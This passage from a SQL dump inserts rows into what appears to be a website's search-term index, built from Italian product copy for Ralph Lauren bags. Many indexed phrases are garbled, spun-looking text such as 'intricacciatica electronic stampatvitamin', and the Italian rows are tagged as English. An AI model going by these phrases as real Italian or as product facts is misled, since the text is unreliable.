occhiali da','gli occhiali da',0,1,1.5,'G4243',1,'en'),(35463,'gli stilisti','gli stilisti',0,1,1.4,'G423423',1,'en'),(35464,'gli stilisti seguono','gli stilisti seguono',0,1,1.6667,'G42342325',1,'en'),(35465,'gna il fatto','gna il fatto',0,1,1.4,'G5413',1,'en'),(35466,'gna possano','gna possano',0,1,1.3667,'G5125',1,'en'),(35467,'gna possano contenere','gna possano contenere',0,1,1.7,'G512525356',1,'en'),(35468,'gna siano','gna siano',0,1,1.3,'G525',1,'en'),(35469,'gna siano necessarie','gna siano necessarie',0,1,1.6667,'G52526',1,'en'),(35470,'gusti','gusti',0,0,0.3333,'G300',1,'en'),(35471,'gusti di','gusti di',0,1,1.2667,'G300',1,'en'),(35472,'gusti di tela','gusti di tela',0,1,1.4333,'G340',1,'en'),(35473,'ha quello','ha quello',0,1,1.3,'H240',1,'en'),(35474,'ha quello che','ha quello che',0,1,1.4333,'H242',1,'en'),(35475,'ha realizzato','ha realizzato',0,1,1.4333,'H6423',1,'en'),(35476,'ha realizzato perla','ha realizzato perla',0,1,1.6333,'H6423164',1,'en'),(35477,'handbag','handbag',0,0,0.4667,'H5312',1,'en'),(35478,'handbag è','handbag è',0,1,1.3,'H5312',1,'en'),(35479,'handbag è realizzato','handbag è realizzato',0,1,1.6667,'H53126423',1,'en'),(35480,'ho','ho',0,0,0.1333,'H000',1,'en'),(35481,'ho bisogno','ho bisogno',0,1,1.3333,'H125',1,'en'),(35482,'ho bisogno elow','ho bisogno elow',0,1,1.5,'H1254',1,'en'),(35483,'horse','hors',0,0,0.3333,'H620',1,'en'),(35484,'horse ricamato','hors ricamato',0,1,1.4667,'H626253',1,'en'),(35485,'horse ricamato sul','hors ricamato sul',0,1,1.6,'H62625324',1,'en'),(35486,'i dettagli','i dettagli',0,1,1.3333,'I324',1,'en'),(35487,'i dettagli i','i dettagli i',0,1,1.4,'I324',1,'en'),(35488,'i gusti','i gusti',0,1,1.2333,'I230',1,'en'),(35489,'i gusti di','i gusti di',0,1,1.3333,'I230',1,'en'),(35490,'i nostri','i nostri',0,1,1.2667,'I5236',1,'en'),(35491,'i nostri accenti','i nostri accenti',0,1,1.5333,'I5236253',1,'en'),(35492,'i nostri ricamati','i nostri ricamati',0,1,1.5667,'I5236253',1,'en'),(35493,'il fatto','il fatto',0,1,1.2667,'I413',1,'en'),(35494,'il fatto gna','il fatto gna',0,1,1.4,'I41325',1,'en'),(35495,'il mare','il mare',0,1,1.2333,'I456',1,'en'),(35496,'il mare deve','il mare deve',0,1,1.4,'I45631',1,'en'),(35497,'il necessario','il necessario',0,1,1.4333,'I4526',1,'en'),(35498,'il necessario ma','il necessario ma',0,1,1.5333,'I45265',1,'en'),(35499,'il pareo','il pareo',0,1,1.2667,'I416',1,'en'),(35500,'il pareo le','il pareo le',0,1,1.3667,'I4164',1,'en'),(35501,'il sogno','il sogno',0,1,1.2667,'I425',1,'en'),(35502,'il sogno di','il sogno di',0,1,1.3667,'I4253',1,'en'),(35503,'in croquet','in croquet',0,1,1.3333,'I52623',1,'en'),(35504,'in croquet semplice','in croquet semplice',0,1,1.6333,'I5262325142',1,'en'),(35505,'in italia','in italia',0,1,1.3,'I534',1,'en'),(35506,'in italia da','in italia da',0,1,1.4,'I5343',1,'en'),(35507,'in onefetto','in onefetto',0,1,1.3667,'I513',1,'en'),(35508,'in onefetto ordine','in onefetto ordine',0,1,1.6,'I513635',1,'en'),(35509,'in pelle','in pelle',0,1,1.2667,'I514',1,'en'),(35510,'in pelle morbida','in pelle morbida',0,1,1.5333,'I5145613',1,'en'),(35511,'in pelle ralphlauren','in pelle ralphlauren',0,1,1.6667,'I514641465',1,'en'),(35512,'in rilievo','in rilievo',0,1,1.3333,'I5641',1,'en'),(35513,'in rilievo area','in rilievo area',0,1,1.5,'I56416',1,'en'),(35514,'in rosa','in rosa',0,1,1.2333,'I562',1,'en'),(35515,'in rosa attraversa','in rosa attraversa',0,1,1.6,'I56236162',1,'en'),(35516,'in turchese','in turchese',0,1,1.3667,'I5362',1,'en'),(35517,'in turchese n\'t','in turchese n',0,1,1.5,'I536253',1,'en'),(35518,'in un','in un',0,1,1.1667,'I500',1,'en'),(35519,'in un colore','in un colore',0,1,1.4,'I5246',1,'en'),(35520,'includono','includono',0,0,0.6,'I52435',1,'en'),(35521,'includono i','includono i',0,1,1.3667,'I52435',1,'en'),(35522,'includono i dettagli','includono i dettagli',0,1,1.6667,'I52435324',1,'en'),(35523,'interne utilissime','intern utilissime',0,1,1.6,'I53653425',1,'en'),(35524,'interne utilissime for','intern utilissime for',0,1,1.7333,'I5365342516',1,'en'),(35525,'interni','interni',0,0,0.4667,'I5365',1,'en'),(35526,'interni tasca','interni tasca',0,1,1.4333,'I536532',1,'en'),(35527,'interni tasca concerning','interni tasca concerning',0,1,1.8,'I53653252652',1,'en'),(35528,'interno','interno',0,0,0.4667,'I5365',1,'en'),(35529,'interno con','interno con',0,1,1.3667,'I536525',1,'en'),(35530,'interno con nothing','interno con nothing',0,1,1.6333,'I536525352',1,'en'),(35531,'intricacciatica','intricacciatica',0,0,1,'I536232',1,'en'),(35532,'intricacciatica electronic','intricacciatica electronic',0,1,1.8667,'I536232423652',1,'en'),(35533,'intricacciatica electronic stampatvitamin','intricacciatica electronic stampatvitamin',0,1,2,'I5362324236523513135',1,'en'),(35534,'ioamo','ioamo',0,0,0.3333,'I500',1,'en'),(35535,'ioamo tantissimo','ioamo tantissimo',0,1,1.5333,'I535325',1,'en'),(35536,'ioamo tantissimo the','ioamo tantissimo the',0,1,1.6667,'I5353253',1,'en'),(35537,'italia da','italia da',0,1,1.3,'I343',1,'en'),(35538,'italia da tela','italia da tela',0,1,1.4667,'I3434',1,'en'),(35539,'italia di','italia di',0,1,1.3,'I343',1,'en'),(35540,'italia di realizzareaccessori','italia di realizzareaccessori',0,1,1.9667,'I343642626',1,'en'),(35541,'italia e','italia e',0,1,1.2667,'I340',1,'en'),(35542,'italia e rifiniti','italia e rifiniti',0,1,1.5667,'I346153',1,'en'),(35543,'khartoom','khartoom',0,0,0.5333,'K635',1,'en'),(35544,'l a.scelta','l a.scelta',0,1,1.3333,'L243',1,'en'),(35545,'l a.scelta è','l a.scelta è',0,1,1.4,'L243',1,'en'),(35546,'l\'interno','l',0,0,0.6,'L5365',1,'en'),(35547,'l\'interno è','l è',0,1,1.3667,'L5365',1,'en'),(35548,'l\'interno è rivestito','l è rivestito',0,1,1.7,'L53656123',1,'en'),(35549,'la beachfront','la beachfront',0,1,1.4333,'L121653',1,'en'),(35550,'la beachfront bag','la beachfront bag',0,1,1.5667,'L12165312',1,'en'),(35551,'la borsa','la borsa',0,1,1.2667,'L162',1,'en'),(35552,'la borsa è','la borsa è',0,1,1.3333,'L162',1,'en'),(35553,'la stuoia','la stuoia',0,1,1.3,'L230',1,'en'),(35554,'la stuoia the','la stuoia the',0,1,1.4333,'L230',1,'en'),(35555,'lato','lato',0,0,0.2667,'L300',1,'en'),(35556,'lato nella','lato nella',0,1,1.3333,'L354',1,'en'),(35557,'lato nella vibrante','lato nella vibrante',0,1,1.6333,'L3541653',1,'en'),(35558,'lauren borse','lauren borse',0,1,1.4,'L65162',1,'en'),(35559,'lauren borse material','lauren borse material',0,1,1.7,'L651625364',1,'en'),(35560,'lauren canvas','lauren canvas',0,1,1.4333,'L652512',1,'en'),(35561,'lauren canvas designer','lauren canvas designer',0,1,1.7333,'L6525123256',1,'en'),(35562,'lauren ha','lauren ha',0,1,1.3,'L650',1,'en'),(35563,'lauren ha quello','lauren ha quello',0,1,1.5333,'L6524',1,'en'),(35564,'lauren in','lauren in',0,1,1.3,'L650',1,'en'),(35565,'lauren in rilievo','lauren in rilievo',0,1,1.5667,'L65641',1,'en'),(35566,'lauren outlet in','lauren outlet in',0,1,1.5333,'L653435',1,'en'),(35567,'lauren outlet popular','lauren outlet popular',0,1,1.7,'L65343146',1,'en'),(35568,'lauren shirt','lauren shirt',0,1,1.4,'L65263',1,'en'),(35569,'lauren shirt a','lauren shirt a',0,1,1.4667,'L65263',1,'en'),(35570,'lauren uomo','lauren uomo',0,1,1.3667,'L650',1,'en'),(35571,'lauren uomo in','lauren uomo in',0,1,1.4667,'L650',1,'en'),(35572,'le nostre','le nostre',0,1,1.3,'L5236',1,'en'),(35573,'le nostre cose','le nostre cose',0,1,1.4667,'L52362',1,'en'),(35574,'le riviste','le riviste',0,1,1.3333,'L6123',1,'en'),(35575,'le riviste e','le riviste e',0,1,1.4,'L6123',1,'en'),(35576,'logo','logo',0,0,0.2667,'L200',1,'en'),(35577,'logo in','logo in',0,1,1.2333,'L250',1,'en'),(35578,'logo in pelle','logo in pelle',0,1,1.4333,'L2514',1,'en'),(35579,'ma anche','ma anche',0,1,1.2667,'M200',1,'en'),(35580,'ma anche la','ma anche la',0,1,1.3667,'M240',1,'en'),(35581,'ma quella','ma quella',0,1,1.3,'M240',1,'en'),(35582,'ma quella per','ma quella per',0,1,1.4333,'M2416',1,'en'),(35583,'ma sony','ma sony',0,1,1.2333,'M250',1,'en'),(35584,'ma sony ericsson','ma sony ericsson',0,1,1.5333,'M25625',1,'en'),(35585,'maancheallure','maancheallur',0,0,0.8667,'M246',1,'en'),(35586,'maancheallure negli','maancheallur negli',0,1,1.6333,'M246524',1,'en'),(35587,'maancheallure negli scaffali','maancheallur negli scaffali',0,1,1.9333,'M246524214',1,'en'),(35588,'manico','manico',0,0,0.4,'M200',1,'en'),(35589,'manico chiusura','manico chiusura',0,1,1.5,'M260',1,'en'),(35590,'manico chiusura a','manico chiusura a',0,1,1.5667,'M260',1,'en'),(35591,'maniglia','maniglia',0,0,0.5333,'M240',1,'en'),(35592,'maniglia costruzione','maniglia costruzione',0,1,1.6667,'M2423625',1,'en'),(35593,'maniglia costruzione in','maniglia costruzione in',0,1,1.7667,'M2423625',1,'en'),(35594,'mare','mare',0,0,0.2667,'M600',1,'en'),(35595,'mare deve','mare deve',0,1,1.3,'M631',1,'en'),(35596,'mare deve poter','mare deve poter',0,1,1.5,'M63136',1,'en'),(35597,'material includono','materi includono',0,1,1.6,'M36452435',1,'en'),(35598,'material includono i','materi includono i',0,1,1.6667,'M36452435',1,'en'),(35599,'meno','meno',0,0,0.2667,'M000',1,'en'),(35600,'meno è','meno è',0,1,1.2,'M000',1,'en'),(35601,'meno è una','meno è una',0,1,1.3333,'M000',1,'en'),(35602,'minus morbida','minu morbida',0,1,1.4333,'M25613',1,'en'),(35603,'minus morbida pelle','minu morbida pelle',0,1,1.6333,'M2561314',1,'en'),(35604,'moda l\'interno','moda l',0,1,1.4667,'M345365',1,'en'),(35605,'moda l\'interno è','moda l è',0,1,1.5333,'M345365',1,'en'),(35606,'morbida','morbida',0,0,0.4667,'M613',1,'en'),(35607,'morbida accentuato','morbida accentuato',0,1,1.6,'M613253',1,'en'),(35608,'morbida accentuato da','morbida accentuato da',0,1,1.7,'M613253',1,'en'),(35609,'morbida pelle','morbida pelle',0,1,1.4333,'M61314',1,'en'),(35610,'morbida pelle vachetta','morbida pelle vachetta',0,1,1.7333,'M61314123',1,'en'),(35611,'multicolore','multicolor',0,0,0.7333,'M43246',1,'en'),(35612,'multicolore robusto','multicolor robusto',0,1,1.6333,'M43246123',1,'en'),(35613,'multicolore robusto as','multicolor robusto as',0,1,1.7333,'M432461232',1,'en'),(35614,'n\'t bellissimo','n bellissimo',0,1,1.4667,'N31425',1,'en'),(35615,'n\'t bellissimo colore','n bellissimo colore',0,1,1.7,'N31425246',1,'en'),(35616,'necessarie','necessari',0,0,0.6667,'N260',1,'en'),(35617,'necessarie o','necessari o',0,1,1.4,'N260',1,'en'),(35618,'necessarie o meno','necessari o meno',0,1,1.5667,'N265',1,'en'),(35619,'necessario','necessario',0,0,0.6667,'N260',1,'en'),(35620,'necessario ma','necessario ma',0,1,1.4333,'N265',1,'en'),(35621,'necessario ma anche','necessario ma anche',0,1,1.6333,'N2652',1,'en'),(35622,'negli','negli',0,0,0.3333,'N240',1,'en'),(35623,'negli scaffali','negli scaffali',0,1,1.4667,'N24214',1,'en'),(35624,'negli scaffali delle','negli scaffali delle',0,1,1.6667,'N2421434',1,'en'),(35625,'nella','nella',0,0,0.3333,'N400',2,'en'),(35626,'nella vibrante','nella vibrante',0,1,1.4667,'N41653',1,'en'),(35627,'nella vibrante filo','nella vibrante filo',0,1,1.6333,'N4165314',1,'en'),(35628,'non solo','non solo',0,1,1.2667,'N240',1,'en'),(35629,'non solo comodi','non solo comodi',0,1,1.5,'N24253',1,'en'),(35630,'nostre','nostr',0,0,0.4,'N236',1,'en'),(35631,'nostre cose','nostr cose',0,1,1.3667,'N2362',1,'en'),(35632,'nostre cose gna','nostr cose gna',0,1,1.5,'N23625',1,'en'),(35633,'nostri accenti','nostri accenti',0,1,1.4667,'N236253',1,'en'),(35634,'nostri accenti big','nostri accenti big',0,1,1.6,'N23625312',1,'en'),(35635,'nostri ricamati','nostri ricamati',0,1,1.5,'N236253',1,'en'),(35636,'nostri ricamati tre','nostri ricamati tre',0,1,1.6333,'N2362536',1,'en'),(35637,'not cassetto','not cassetto',0,1,1.4,'N323',1,'en'),(35638,'not cassetto personale','not cassetto personale',0,1,1.7333,'N32316254',1,'en'),(35639,'nothing','noth',1,0,0.0583,'N352',1,'en'),(35640,'nothing finiture','noth finiture',0,1,1.5333,'N3521536',1,'en'),(35641,'nothing finiture in','noth finiture in',0,1,1.6333,'N35215365',1,'en'),(35642,'o meno','o meno',0,1,1.2,'O500',1,'en'),(35643,'o meno è','o meno è',0,1,1.2667,'O500',1,'en'),(35644,'occhiali da on','occhiali da on',0,1,1.4667,'O2435',1,'en'),(35645,'of maniglia','of maniglia',0,1,1.3667,'O1524',1,'en'),(35646,'of maniglia costruzione','of maniglia costruzione',0,1,1.7667,'O152423625',1,'en'),(35647,'on ma','on ma',0,1,1.1667,'O500',1,'en'),(35648,'on ma sony','on ma sony',0,1,1.3333,'O525',1,'en'),(35649,'onefetto','onefetto',0,0,0.5333,'O513',1,'en'),(35650,'onefetto ordine','onefetto ordine',0,1,1.5,'O513635',1,'en'),(35651,'ordine','ordin',0,0,0.4,'O635',1,'en'),(35652,'originali','originali',0,0,0.6,'O6254',1,'en'),(35653,'originali ralph','originali ralph',0,1,1.5,'O6254641',1,'en'),(35654,'originali ralph lauren','originali ralph lauren',0,1,1.7333,'O6254641465',1,'en'),(35655,'ormai','ormai',0,0,0.3333,'O650',1,'en'),(35656,'ormai tutti','ormai tutti',0,1,1.3667,'O653',1,'en'),(35657,'ormai tutti gli','ormai tutti gli',0,1,1.5,'O65324',1,'en'),(35658,'outlet in','outlet in',0,1,1.3,'O3435',1,'en'),(35659,'outlet in italia','outlet in italia',0,1,1.5333,'O343534',1,'en'),(35660,'outlet popular','outlet popular',0,1,1.4667,'O343146',1,'en'),(35661,'outlet popular ralph','outlet popular ralph',0,1,1.6667,'O34314641',1,'en'),(35662,'oversize','overs',0,0,0.5333,'O162',1,'en'),(35663,'oversize trovo','overs trovo',0,1,1.4667,'O162361',1,'en'),(35664,'oversize trovo gna','overs trovo gna',0,1,1.6,'O16236125',1,'en'),(35665,'pages 3','page 3',0,1,1.2333,'P200',1,'en'),(35666,'pareo','pareo',0,0,0.3333,'P600',1,'en'),(35667,'pareo le','pareo le',0,1,1.2667,'P640',1,'en'),(35668,'pareo le riviste','pareo le riviste',0,1,1.5333,'P646123',1,'en'),(35669,'parte','part',0,0,0.3333,'P630',1,'en'),(35670,'parte anteriore','part anteriore',0,1,1.5,'P63536',1,'en'),(35671,'parte anteriore interni','part anteriore interni',0,1,1.7667,'P635365365',1,'en'),(35672,'pelle','pell',0,0,0.3333,'P400',1,'en'),(35673,'pelle intricacciatica','pell intricacciatica',0,1,1.7,'P4536232',1,'en'),(35674,'pelle intricacciatica electronic','pell intricacciatica electronic',0,1,2,'P4536232423652',1,'en'),(35675,'pelle morbida','pell morbida',0,1,1.4333,'P45613',1,'en'),(35676,'pelle morbida accentuato','pell morbida accentuato',0,1,1.8,'P45613253',1,'en'),(35677,'pelle ralphlauren','pell ralphlauren',0,1,1.5667,'P4641465',1,'en'),(35678,'pelle ralphlauren ha','pell ralphlauren ha',0,1,1.6667,'P4641465',1,'en'),(35679,'pelle vachetta','pell vachetta',0,1,1.4667,'P4123',1,'en'),(35680,'pelle vachetta ralph','pell vachetta ralph',0,1,1.6667,'P4123641',1,'en'),(35681,'per il mare','per il mare',0,1,1.3667,'P6456',1,'en'),(35682,'per tutti','per tutti',0,1,1.3,'P630',1,'en'),(35683,'per tutti i','per tutti i',0,1,1.3667,'P630',1,'en'),(35684,'per voi','per voi',0,1,1.2333,'P610',1,'en'),(35685,'per voi la','per voi la',0,1,1.3333,'P614',1,'en'),(35686,'perfetta','perfetta',0,0,0.5333,'P613',1,'en'),(35687,'perfetta alleata','perfetta alleata',0,1,1.5333,'P61343',1,'en'),(35688,'perfetta alleata ma','perfetta alleata ma',0,1,1.6333,'P613435',1,'en'),(35689,'perla','perla',0,0,0.3333,'P640',1,'en'),(35690,'perla prossima','perla prossima',0,1,1.4667,'P641625',1,'en'),(35691,'perla prossima est','perla prossima est',0,1,1.6,'P64162523',1,'en'),(35692,'personale','personal',0,0,0.6,'P6254',1,'en'),(35693,'personale dove','personal dove',0,1,1.4667,'P625431',1,'en'),(35694,'personale dove possiamo','personal dove possiamo',0,1,1.7667,'P62543125',1,'en'),(35695,'pieced','piec',0,0,0.4,'P230',1,'en'),(35696,'pieced in','piec in',0,1,1.3,'P235',1,'en'),(35697,'pieced in rosa','piec in rosa',0,1,1.4667,'P23562',1,'en'),(35698,'plissettate','plissett',0,0,0.7333,'P423',1,'en'),(35699,'plissettate di','plissett di',0,1,1.4667,'P423',1,'en'),(35700,'plissettate di cotone','plissett di cotone',0,1,1.7,'P423235',1,'en'),(35701,'polo italia e','polo italia e',0,1,1.4333,'P434',1,'en'),(35702,'polo su','polo su',0,1,1.2333,'P420',1,'en'),(35703,'polo su un','polo su un',0,1,1.3333,'P425',1,'en'),(35704,'popular ralph','popular ralph',0,1,1.4333,'P4641',1,'en'),(35705,'popular ralph lauren','popular ralph lauren',0,1,1.6667,'P4641465',1,'en'),(35706,'possano','possano',0,0,0.4667,'P250',1,'en'),(35707,'possano contenere','possano contenere',0,1,1.5667,'P2525356',1,'en'),(35708,'possano contenere tutto','possano contenere tutto',0,1,1.7667,'P25253563',1,'en'),(35709,'possiamo','possiamo',0,0,0.5333,'P250',1,'en'),(35710,'possiamo sistemare','possiamo sistemare',0,1,1.6,'P252356',1,'en'),(35711,'possiamo sistemare le','possiamo sistemare le',0,1,1.7,'P2523564',1,'en'),(35712,'poter','poter',0,0,0.3333,'P360',1,'en'),(35713,'poter contenere','poter contenere',0,1,1.5,'P3625356',1,'en'),(35714,'poter contenere non','poter contenere non',0,1,1.6333,'P36253565',1,'en'),(35715,'pratica','pratica',0,0,0.4667,'P632',1,'en'),(35716,'pratica e','pratica e',0,1,1.3,'P632',1,'en'),(35717,'pratica e capiente','pratica e capiente',0,1,1.6,'P632153',1,'en'),(35718,'pratica e stilosa','pratica e stilosa',0,1,1.5667,'P632342',1,'en'),(35719,'proposta','proposta',0,0,0.5333,'P6123',1,'en'),(35720,'proposta in','proposta in',0,1,1.3667,'P61235',1,'en'),(35721,'proposta in turchese','proposta in turchese',0,1,1.6667,'P61235362',1,'en'),(35722,'prossima','prossima',0,0,0.5333,'P625',1,'en'),(35723,'prossima est','prossima est',0,1,1.4,'P62523',1,'en'),(35724,'prossima est una','prossima est una',0,1,1.5333,'P625235',1,'en'),(35725,'put proposta','put proposta',0,1,1.4,'P316123',1,'en'),(35726,'put proposta in','put proposta in',0,1,1.5,'P3161235',1,'en'),(35727,'quella per','quella per',0,1,1.3333,'Q416',1,'en'),(35728,'quella per il','quella per il',0,1,1.4333,'Q4164',1,'en'),(35729,'quello','quello',0,0,0.4,'Q400',1,'en'),(35730,'quello che','quello che',0,1,1.3333,'Q420',1,'en'),(35731,'quello che fa','quello che fa',0,1,1.4333,'Q421',1,'en'),(35732,'questa tendenza','questa tendenza',0,1,1.5,'Q35352',1,'en'),(35733,'questa tendenza cercando','questa tendenza cercando',0,1,1.8,'Q353526253',1,'en'),(35734,'raffinata','raffinata',0,0,0.6,'R153',1,'en'),(35735,'raffinata disadvantage','raffinata disadvantage',0,1,1.7333,'R153231532',1,'en'),(35736,'raffinata disadvantage doppio','raffinata disadvantage doppio',0,1,1.9667,'R15323153231',1,'en'),(35737,'ralph lauren borse','ralph lauren borse',0,1,1.6,'R41465162',1,'en'),(35738,'ralph lauren canvas','ralph lauren canvas',0,1,1.6333,'R414652512',1,'en'),(35739,'ralph lauren shirt','ralph lauren shirt',0,1,1.6,'R41465263',1,'en'),(35740,'ralph lauren uomo','ralph lauren uomo',0,1,1.5667,'R41465',1,'en'),(35741,'ralphlauren','ralphlauren',0,0,0.7333,'R41465',1,'en'),(35742,'ralphlauren ha','ralphlauren ha',0,1,1.4667,'R41465',1,'en'),(35743,'ralphlauren ha realizzato','ralphlauren ha realizzato',0,1,1.8333,'R414656423',1,'en'),(35744,'ralphlauren italia','ralphlauren italia',0,1,1.6,'R4146534',1,'en'),(35745,'ralphlauren italia di','ralphlauren italia di',0,1,1.7,'R41465343',1,'en'),(35746,'rassicurante','rassicurant',0,0,0.8,'R2653',1,'en'),(35747,'rassicurante e','rassicurant e',0,1,1.4667,'R2653',1,'en'),(35748,'rassicurante e ormai','rassicurant e ormai',0,1,1.6667,'R265365',1,'en'),(35749,'realizzareaccessori','realizzareaccessori',0,0,1,'R42626',1,'en'),(35750,'realizzareaccessori non','realizzareaccessori non',0,1,1.7667,'R426265',1,'en'),(35751,'realizzareaccessori non solo','realizzareaccessori non solo',0,1,1.9333,'R42626524',1,'en'),(35752,'realizzato','realizzato',0,0,0.6667,'R423',1,'en'),(35753,'realizzato perla','realizzato perla',0,1,1.5333,'R423164',1,'en'),(35754,'realizzato perla prossima','realizzato perla prossima',0,1,1.8333,'R4231641625',1,'en'),(35755,'realizzato polo','realizzato polo',0,1,1.5,'R42314',1,'en'),(35756,'realizzato polo ralph','realizzato polo ralph',0,1,1.7,'R42314641',1,'en'),(35757,'result of maniglia','result of maniglia',0,1,1.6,'R2431524',1,'en'),(35758,'ricamati','ricamati',0,0,0.5333,'R253',1,'en'),(35759,'ricamati tre','ricamati tre',0,1,1.4,'R2536',1,'en'),(35760,'ricamati tre giocatori','ricamati tre giocatori',0,1,1.7333,'R2536236',1,'en'),(35761,'ricamato','ricamato',0,0,0.5333,'R253',1,'en'),(35762,'ricamato sul','ricamato sul',0,1,1.4,'R25324',1,'en'),(35763,'ricamato sul davanti','ricamato sul davanti',0,1,1.6667,'R253243153',1,'en'),(35764,'ricerca','ricerca',0,0,0.4667,'R262',1,'en'),(35765,'ricerca di','ricerca di',0,1,1.3333,'R2623',1,'en'),(35766,'ricerca di una','ricerca di una',0,1,1.4667,'R26235',1,'en'),(35767,'rifiniti','rifin',0,0,0.5333,'R153',1,'en'),(35768,'rifiniti disadvantage','rifin disadvantage',0,1,1.7,'R153231532',1,'en'),(35769,'rifiniti disadvantage i','rifin disadvantage i',0,1,1.7667,'R153231532',1,'en'),(35770,'righe','righ',0,0,0.3333,'R200',1,'en'),(35771,'righe ralph','righ ralph',0,1,1.3667,'R2641',1,'en'),(35772,'righe ralph lauren','righ ralph lauren',0,1,1.6,'R2641465',1,'en'),(35773,'rilievo','rilievo',0,0,0.4667,'R410',1,'en'),(35774,'rilievo area','rilievo area',0,1,1.4,'R416',1,'en'),(35775,'rilievo area logo','rilievo area logo',0,1,1.5667,'R41642',1,'en'),(35776,'riporvi','riporvi',0,0,0.4667,'R161',1,'en'),(35777,'riporvi davvero','riporvi davvero',0,1,1.5,'R161316',1,'en'),(35778,'riporvi davvero di','riporvi davvero di',0,1,1.6,'R1613163',1,'en'),(35779,'rivestito','rivestito',0,0,0.6,'R123',1,'en'),(35780,'rivestito con','rivestito con',0,1,1.4333,'R12325',1,'en'),(35781,'rivestito con una','rivestito con una',0,1,1.5667,'R12325',1,'en'),(35782,'riviste','rivist',0,0,0.4667,'R123',1,'en'),(35783,'riviste e','rivist e',0,1,1.3,'R123',1,'en'),(35784,'riviste e gli','rivist e gli',0,1,1.4333,'R12324',1,'en'),(35785,'robusto as','robusto as',0,1,1.3333,'R1232',1,'en'),(35786,'robusto as a','robusto as a',0,1,1.4,'R1232',1,'en'),(35787,'ron','ron',0,0,0.2,'R500',2,'en'),(35788,'ron lauren','ron lauren',0,1,1.3333,'R5465',1,'en'),(35789,'ron lauren ha','ron lauren ha',0,1,1.4333,'R5465',1,'en'),(35790,'rosa','rosa',0,0,0.2667,'R200',1,'en'),(35791,'rosa attraversa','rosa attraversa',0,1,1.5,'R236162',1,'en'),(35792,'rosa attraversa are','rosa attraversa are',0,1,1.6333,'R2361626',1,'en'),(35793,'sacca','sacca',0,0,0.3333,'S000',1,'en'),(35794,'sacca e','sacca e',0,1,1.2333,'S000',1,'en'),(35795,'sacca e tasche','sacca e tasche',0,1,1.4667,'S320',1,'en'),(35796,'scaffali','scaffali',0,0,0.5333,'S140',1,'en'),(35797,'scaffali delle','scaffali delle',0,1,1.4667,'S1434',1,'en'),(35798,'scaffali delle varie','scaffali delle varie',0,1,1.6667,'S143416',1,'en'),(35799,'scomparto','scomparto',0,0,0.6,'S5163',1,'en'),(35800,'scomparto interno','scomparto interno',0,1,1.5667,'S51635365',1,'en'),(35801,'scomparto interno con','scomparto interno con',0,1,1.7,'S5163536525',1,'en'),(35802,'seguono','seguono',0,0,0.4667,'S500',1,'en'),(35803,'seguono questa','seguono questa',0,1,1.4667,'S523',1,'en'),(35804,'seguono questa tendenza','seguono questa tendenza',0,1,1.7667,'S5235352',1,'en'),(35805,'semplice','semplic',0,0,0.5333,'S5142',1,'en'),(35806,'semplice e','semplic e',0,1,1.3333,'S5142',1,'en'),(35807,'semplice e raffinata','semplic e raffinata',0,1,1.6667,'S51426153',1,'en'),(35808,'shirt a','shirt a',0,1,1.2333,'S630',1,'en'),(35809,'shirt a righe','shirt a righe',0,1,1.4333,'S6362',1,'en'),(35810,'sia rassicurante','sia rassicurante',0,1,1.5333,'S62653',1,'en'),(35811,'sia rassicurante e','sia rassicurante e',0,1,1.6,'S62653',1,'en'),(35812,'siano','siano',0,0,0.3333,'S500',1,'en'),(35813,'siano necessarie','siano necessarie',0,1,1.5333,'S526',1,'en'),(35814,'siano necessarie o','siano necessarie o',0,1,1.6,'S526',1,'en'),(35815,'siete','siet',0,0,0.3333,'S300',1,'en'),(35816,'siete alla','siet alla',0,1,1.3333,'S340',1,'en'),(35817,'siete alla ricerca','siet alla ricerca',0,1,1.6,'S346262',1,'en'),(35818,'sistemare','sistemar',0,0,0.6,'S356',1,'en'),(35819,'sistemare le','sistemar le',0,1,1.4,'S3564',1,'en'),(35820,'sistemare le nostre','sistemar le nostre',0,1,1.6333,'S35645236',1,'en'),(35821,'sogno','sogno',0,0,0.3333,'S500',1,'en'),(35822,'sogno di','sogno di',0,1,1.2667,'S530',1,'en'),(35823,'sogno di tutte','sogno di tutte',0,1,1.4667,'S530',1,'en'),(35824,'solari','solari',0,0,0.4,'S460',1,'en'),(35825,'solari il','solari il',0,1,1.3,'S464',1,'en'),(35826,'solari il pareo','solari il pareo',0,1,1.5,'S46416',1,'en'),(35827,'solo','solo',0,0,0.2667,'S400',1,'en'),(35828,'solo comodi','solo comodi',0,1,1.3667,'S4253',1,'en'),(35829,'solo comodi maancheallure','solo comodi maancheallure',0,1,1.8333,'S42535246',1,'en'),(35830,'sony','soni',0,0,0.2667,'S500',1,'en'),(35831,'sony ericsson','soni ericsson',0,1,1.4333,'S5625',1,'en'),(35832,'sony ericsson siete','soni ericsson siete',0,1,1.6333,'S562523',1,'en'),(35833,'sovradimensionato','sovradimensionato',0,0,1,'S1635253',1,'en'),(35834,'sovradimensionato polo','sovradimensionato polo',0,1,1.7333,'S163525314',1,'en'),(35835,'sovradimensionato polo su','sovradimensionato polo su',0,1,1.8333,'S1635253142',1,'en'),(35836,'specialist troviamo','specialist troviamo',0,1,1.6333,'S12423615',1,'en'),(35837,'specialist troviamo borse','specialist troviamo borse',0,1,1.8333,'S12423615162',1,'en'),(35838,'stampatvitamin','stampatvitamin',0,0,0.9333,'S3513135',1,'en'),(35839,'stampatvitamin y','stampatvitamin y',0,1,1.5333,'S3513135',1,'en'),(35840,'stampatvitamin y l','stampatvitamin y l',0,1,1.6,'S35131354',1,'en'),(35841,'stilisti','stilisti',0,0,0.5333,'S3423',1,'en'),(35842,'stilisti seguono','stilisti seguono',0,1,1.5333,'S342325',1,'en'),(35843,'stilisti seguono questa','stilisti seguono questa',0,1,1.7667,'S34232523',1,'en'),(35844,'stilosa','stilosa',0,0,0.4667,'S342',1,'en'),(35845,'stilosa ron','stilosa ron',0,1,1.3667,'S34265',1,'en'),(35846,'stilosa ron lauren','stilosa ron lauren',0,1,1.6,'S34265465',1,'en'),(35847,'striscia','striscia',0,0,0.5333,'S362',1,'en'),(35848,'striscia bandiera','striscia bandiera',0,1,1.5667,'S3621536',1,'en'),(35849,'striscia bandiera pieced','striscia bandiera pieced',0,1,1.8,'S3621536123',1,'en'),(35850,'stuoia','stuoia',0,0,0.4,'S300',1,'en'),(35851,'stuoia the','stuoia the',0,1,1.3333,'S300',1,'en'),(35852,'stuoia the creme','stuoia the creme',0,1,1.5333,'S3265',1,'en'),(35853,'su un','su un',0,1,1.1667,'S500',1,'en'),(35854,'su un lato','su un lato',0,1,1.3333,'S543',1,'en'),(35855,'sul davanti','sul davanti',0,1,1.3667,'S43153',1,'en'),(35856,'sul davanti striscia','sul davanti 